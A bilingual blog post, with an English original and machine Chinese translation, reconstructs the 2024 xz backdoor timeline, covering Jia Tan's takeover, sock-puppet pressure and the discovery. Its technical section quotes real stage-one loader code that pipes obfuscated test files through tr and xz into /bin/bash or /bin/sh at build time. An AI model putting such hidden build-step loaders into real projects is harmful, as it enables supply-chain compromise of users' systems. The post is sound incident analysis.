Everything I Know About the Xz Backdoor
我所知道的关于 Xz 后门的一切

state 状态: unstable 不稳定
in: blog 博客
date 日期: 3/29/2024

😖 Unstable 😖 不稳定

Updating at the speed of light, blink once and a word could be gone! These nodes are eratic, unstable, dangerous, but that's why they are fun.
以光速更新，眨眼间一个词可能就消失了！这些节点是不稳定的，危险的，但这就是它们有趣的地方。

Please note: This is being updated in real time. The intent is to make sense of lots of simultaneous discoveries regarding this backdoor. last updated: 1:00 AM EST
请注意：这正在实时更新。目的是理解关于这个后门的许多同时发现。最后更新：美国东部时间凌晨 1 点。

Update: The GitHub page for xz has been suspended.
更新：xz 的 GitHub 页面已被暂停。

2021

JiaT75 (Jia Tan) creates their GitHub account.
JiaT75 (贾谭) 创建了他们的 GitHub 账户。

The first commits they make are not to xz, but they are deeply suspicious. Specifically, they open a PR in libarchive: Added error text to warning when untaring with bsdtar. This commit does a little more than it says. It replaces safe_fprint with an unsafe variant, potentially introducing another vulnerability. The code was merged without any discussion, and ~~lives on to this day~~ (patched). libarchive should also be considered compromised until proven otherwise.
他们做的第一次提交并非针对 xz，但他们深感疑虑。具体来说，他们在 libarchive 中打开了一个 PR：在使用 bsdtar 解压时，向警告添加了错误文本。这个提交做的比它说的要多。它用一个不安全的变体替换了 safe_fprint ，可能引入了另一个漏洞。这段代码在没有任何讨论的情况下被合并，直到今天仍然存在（已修补）。除非有证据证明，否则也应认为 libarchive 已经被破坏。

2022

In April 2022, Jia Tan submits a patch via a mailing list. The patch is irrelevant, but the events that follow are. A new persona – Jigar Kumar enters, and begins pressuring for this patch to be merged.
在 2022 年 4 月，贾谭通过邮件列表提交了一个补丁。这个补丁并不重要，但随后发生的事件却是。一个新的人物 - 吉加尔·库马尔出现，开始施压要求合并这个补丁。

Soon after, Jigar Kumar begins pressuring Lasse Collin to add another maintainer to XZ. In the fallout, we learn a little bit about mental health in open source.
不久之后，Jigar Kumar 开始向 Lasse Collin 施压，要求他在 XZ 中增加另一位维护者。在这场纷争中，我们对开源中的心理健康有了一些了解。

Three days after the emails pressuring Lasse Collin to add another maintainer, JiaT75 makes their first commit to xz: Tests: Created tests for hardware functions.. Since this commit, they become a regular contributor to xz (they are currently the second most active). It’s unclear exactly when they became trusted in this repository.
在向 Lasse Collin 施压要求增加另一位维护者的邮件发出三天后，JiaT75 对 xz 进行了他们的第一次提交：测试：为硬件功能创建了测试。自此次提交以来，他们成为 xz 的常规贡献者（他们目前是第二活跃的）。他们何时开始在这个仓库中被信任，目前尚不清楚。

Jigar Kumar is never seen again.
再也没有人见到 Jigar Kumar 了。

Glyph ^{@glyph@mastodon.social}

@eb I really hope that this causes an industry-wide reckoning with the common practice of letting your entire goddamn product rest on the shoulders of one overworked person having a slow mental health crisis without financially or operationally supporting them whatsoever. I want everyone who has an open source dependency to read this message
@eb 我真心希望这会引发整个行业对这种普遍做法的反思：让你的整个该死的产品都依赖于一个正在慢慢经历心理健康危机的过度劳累的人，而且在财务或操作上完全不支持他们。我希望每一个有开源依赖的人都能读到这条信息。https://www.mail-archive.com/xz-devel@tukaani.org/msg00567.html

^{Mar 29, 2024, 20:43} ^{295 retoots}

2023

JiaT75 merges their first commit on Jan 7 2023¹, which gives us good indication into when they fully gain trust.
JiaT75 在 2023 年 1 月 7 日合并了他们的第一次提交 ¹ ，这给了我们他们完全获得信任的好预兆。

In March, the primary contact email in Google’s oss-fuzz is updated to be Jia’s, instead of Lasse Collin.
在三月份，Google 的 oss-fuzz 的主要联系邮箱更新为 Jia 的邮箱，而不再是 Lasse Collin 的邮箱。

Testing infrastructure that will be used in this exploit is committed. Despite Lasse Collin being attributed as the author for this, Jia Tan committed it, and it was originally written by Hans Jansen in June:
将在此漏洞中使用的测试基础设施已经提交。尽管 Lasse Collin 被归为此事的作者，但是 Jia Tan 提交了它，而它最初是由 Hans Jansen 在六月编写的。

Commit: liblzma: Add ifunc implementation to crc64_fast.c
提交：liblzma：在 crc64_fast.c 中添加 ifunc 实现
PR: Replaced crc64_fast constructor with ifunc by hansjans162
PR：由 hansjans162 用 ifunc 替换了 crc64_fast 构造函数

Hans Jansen’s account was seemingly made specifically to create this pull request. There is very little activity before and after. They will later push for the compromised version of XZ to be included in Debian.
汉斯·詹森的账户似乎是专门为了创建这个拉取请求而设立的。在此之前和之后的活动非常少。他们后来将推动将受损的 XZ 版本包含在 Debian 中。

In July, a PR was opened in oss-fuzz to disable ifunc for fuzzing builds, due to issues introduced by the changes above. This appears to be deliberate to mask the malicious changes that will be introduced soon.
在七月，一个公关在 oss-fuzz 中开启，以禁用 fuzzing 构建的 ifunc，这是由于上述更改引入的问题。这似乎是故意的，以掩盖即将引入的恶意更改。

2024

A pull request for Google’s oss-fuzz is opened that changes the URL for the project from tukaani.org/xz/ to xz.tukaani.org/xz-utils/. tukaani.org is hosted at 5.44.245.25 in Finland, at this hosting company. The xz subdomain, meanwhile, points to GitHub pages. This furthers the amount of control Jia has over the project.
一个针对 Google 的 oss-fuzz 的拉取请求已经打开，该请求将项目的 URL 从 tukaani.org/xz/更改为 xz.tukaani.org/xz-utils/。tukaani.org 托管在芬兰的 5.44.245.25 这家托管公司。与此同时， xz 子域名指向 GitHub 页面。这进一步增加了 Jia 对项目的控制力度。

A commit containing the final steps required to execute this backdoor is added to the repository:
将包含执行此后门所需的最后步骤的提交添加到仓库中：

The discovery 发现

An email is sent to the oss-security mailing list: backdoor in upstream xz/liblzma leading to ssh server compromise, announcing this discovery, and doing it’s best to explain the exploit chain.
一封电子邮件被发送到 oss-security 邮件列表：在上游 xz/liblzma 中的后门导致 ssh 服务器被破坏，宣布了这一发现，并尽其所能解释利用链。

AndresFreundTec ^{@AndresFreundTec@mastodon.social}

I was doing some micro-benchmarking at the time, needed to quiesce the system to reduce noise. Saw sshd processes were using a surprising amount of CPU, despite immediately failing because of wrong usernames etc. Profiled sshd, showing lots of cpu time in liblzma, with perf unable to attribute it to a symbol. Got suspicious. Recalled that I had seen an odd valgrind complaint in automated testing of postgres, a few weeks earlier, after package updates.
当时，我正在进行一些微观基准测试，需要使系统静止以减少噪音。我看到 sshd 进程使用了令人惊讶的大量 CPU，尽管由于用户名等错误立即失败。对 sshd 进行了分析，显示 liblzma 中有大量的 CPU 时间，perf 无法将其归因于一个符号。我开始怀疑。我回想起几周前，在包更新后，我在对 postgres 进行自动化测试时看到了一个奇怪的 valgrind 投诉。

Really required a lot of coincidences.
真的需要很多的巧合。

^{Mar 29, 2024, 18:32} ^{346 retoots}

A gist has been published with a very good high level technical overview and a “what you need to know”
一个包含非常好的高级技术概述和“你需要知道什么”的要点已经发布

I understand this chain even less than the original author, but here is me half reciting, half making sense of what’s happening:
我对这个链条的理解甚至比原作者还要模糊，但这就是我一边背诵，一边试图理解正在发生的事情：

This isn't good yet, I'm still figuring it out
这还不够好，我还在琢磨中

Code is added to the upstream tarballs that injects an obfuscated script from the files committed above to be “executed at the end of configure”. This code, in turn, “modifies $builddir/src/liblzma/Makefile to contain”

am__test = bad-3-corrupt_lzma2.xz
...
am__test_dir=$(top_srcdir)/tests/files/$(am__test)
...
sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1

(you’ll notice this was the file added above) “which ends up as” (what ends up as?)

sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr "	 \-_" " 	_\-" | xz -d | /bin/bash >/dev/null 2>&1;

The sed reportedly transforms into

####Hello####
#��Z�.hj�
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

You’ll notice this script is piping one of these files attached in the above commits into a series of very very obfuscated head calls. And after deobfuscation of this script, it leads to a sh file attached in the email:

injected.txt

There are a number of conditions identified that are required for the process to continue:

Building with gcc and the gnu linker
only x86-64 linux
Running as part of a debian or RPM package build

The final binary reportedly is used in some way to bypass sshd authentication checks.

A sudden push for inclusion
一场突然的推动包容性

A request for the vulnerable version to be included in Debian is opened by Hans:
Hans 发起了一个请求，要求在 Debian 中包含易受攻击的版本：

#1067708 - xz-utils: New upstream version available
#1067708 - xz-utils: 可用的新上游版本

This request was opened the same week Hans’ Debian account was created. The account created a few similar “update” requests in various low traffic repositories to build credibility, before asking for this one.
这个请求是在 Hans 的 Debian 账户创建的同一周开启的。这个账户在请求这个之前，已经在各种低流量的仓库中创建了一些类似的“更新”请求，以建立信誉。

A number of other, suspicious, anonymous name+number accounts with little former activity also push for its inclusion, including misoeater91 and krygorin4545. krygorin4545’s PGP key was made 2 days prior to today.
其他一些可疑的、匿名的名字+数字账户也在推动其包含，包括 misoeater91 和 krygorin4545。krygorin4545 的 PGP 密钥是在两天前制作的。

Also seeing this bug. Extra valgrind output causes some failed tests for me. Looks like the new version will resolve it. Would like this new version so I can continue work.
我也遇到了这个错误。额外的 valgrind 输出导致我有些测试失败。看起来新版本会解决这个问题。我希望能有这个新版本，这样我可以继续工作。

I noticed this last week and almost made a valgrind bug. Glad to see it being fixed.
我上周注意到这个问题，差点就报告了一个 valgrind 的错误。很高兴看到它被修复了。
Thanks Hans! 谢谢你，汉斯！

The Valgrind bugs mentioned were introduced by this malicious injection, as noted in the email to OSS-Security:
如 OSS-Security 的邮件所述，提到的 Valgrind 错误是由这种恶意注入引入的

Subsequently the injected code (more about that below) caused valgrind errors and crashes in some configurations, due the stack layout differing from what the backdoor was expecting. These issues were attempted to be worked around in 5.6.1:
随后注入的代码（下面会有更多介绍）在某些配置中导致了 valgrind 错误和崩溃，因为堆栈布局与后门预期的不同。这些问题在 5.6.1 中试图得到解决：

A pull request to a go library by a 1password employee is opened asking to upgrade the library to the vulnerable version, however, it was all unfortunate timing. 1Password reached out by email referring me to this comment, and everything seems to check out.
一位 1Password 的员工向一个 go 库发起了一个拉取请求，要求将库升级到易受攻击的版本，然而，这全都是不幸的时机。1Password 通过电子邮件联系我，引用我查看这个评论，一切似乎都符合预期。

A fedora contributor states that Jia was pushing for its inclusion in Fedora as it contains “great new features”
一位 Fedora 贡献者表示，贾正在推动 Fedora 包含它，因为它包含了“伟大的新功能”

Jia Tan also attempted to get it into Ubuntu days before the beta freeze.
贾谭也试图在测试版冻结前的几天将其加入 Ubuntu。

As of 9:00 PM UTC, GitHub has suspended JiaT75’s account. Thanks? They also banned the repository, meaning people can no longer audit the changes made to it without resorting to mirrors. Immensely helpful, GitHub. They also suspended Lasse Collin’s account, which is completely disgraceful.
截至格林尼治标准时间晚上 9 点，GitHub 已经暂停了 JiaT75 的账户。感谢？他们还封禁了该仓库，这意味着人们无法在不借助镜像的情况下审核对其所做的更改。GitHub，你真是大大的帮忙。他们还暂停了 Lasse Collin 的账户，这完全是不光彩的行为。

Important notes on LinkedIn
关于 LinkedIn 的重要说明

I have received a few emails alerting me to a LinkedIn of somebody named Jia Tan². Their bio boasts of large-scale vulnerability management. They claim to live in California. Is this our man? The commits on JiaT75’s GitHub are set to +0800, which would not indicate presence in California. This may have been a bad attempt to set the timezone to UTC-0800, which would be California. Most of the commits were made between UTC 12-17, which is awfully early for California. In my opinion, there is not sufficient evidence that the LinkedIn being discussed is our man. I think identity theft is more likely, but I am of course open to more evidence.
我收到了几封电子邮件，提醒我有一个名叫贾谭的 LinkedIn 账户。他们的个人简介中大肆吹嘘大规模的漏洞管理能力。他们声称住在加利福尼亚。这是我们要找的人吗？JiaT75 在 GitHub 上的提交设置为+0800，这并不表明他在加利福尼亚。这可能是错误地将时区设置为 UTC-0800，也就是加利福尼亚的时间。大部分提交都在 UTC 12-17 之间完成，这对于加利福尼亚来说过于早了。在我看来，没有足够的证据表明正在讨论的 LinkedIn 账户就是我们要找的人。我认为身份盗窃的可能性更大，但我当然愿意接受更多的证据。

👟 Footnotes 👟 脚注

Thanks @joeyh@hachyderm.io ↩︎
感谢 @joeyh@hachyderm.io ↩︎
I was also alerted to discussions of this on Gab, which should tell you what you need to know. ↩︎
我也被告知这在 Gab 上有讨论，这应该能告诉你你需要知道的信息。↩︎

You are the 50457th visitor to this page! I'm receiving $3.27 per week from 6 patrons, and my goal is $5.00. Feel free to contact me with any questions or comments :)
你是访问这个页面的第 50457 位访客！我每周从 6 位赞助者那里收到 3.27 美元，我的目标是 5.00 美元。如果有任何问题或评论，欢迎随时联系我:)

Everything I Know About the Xz Backdoor我所知道的关于 Xz 后门的一切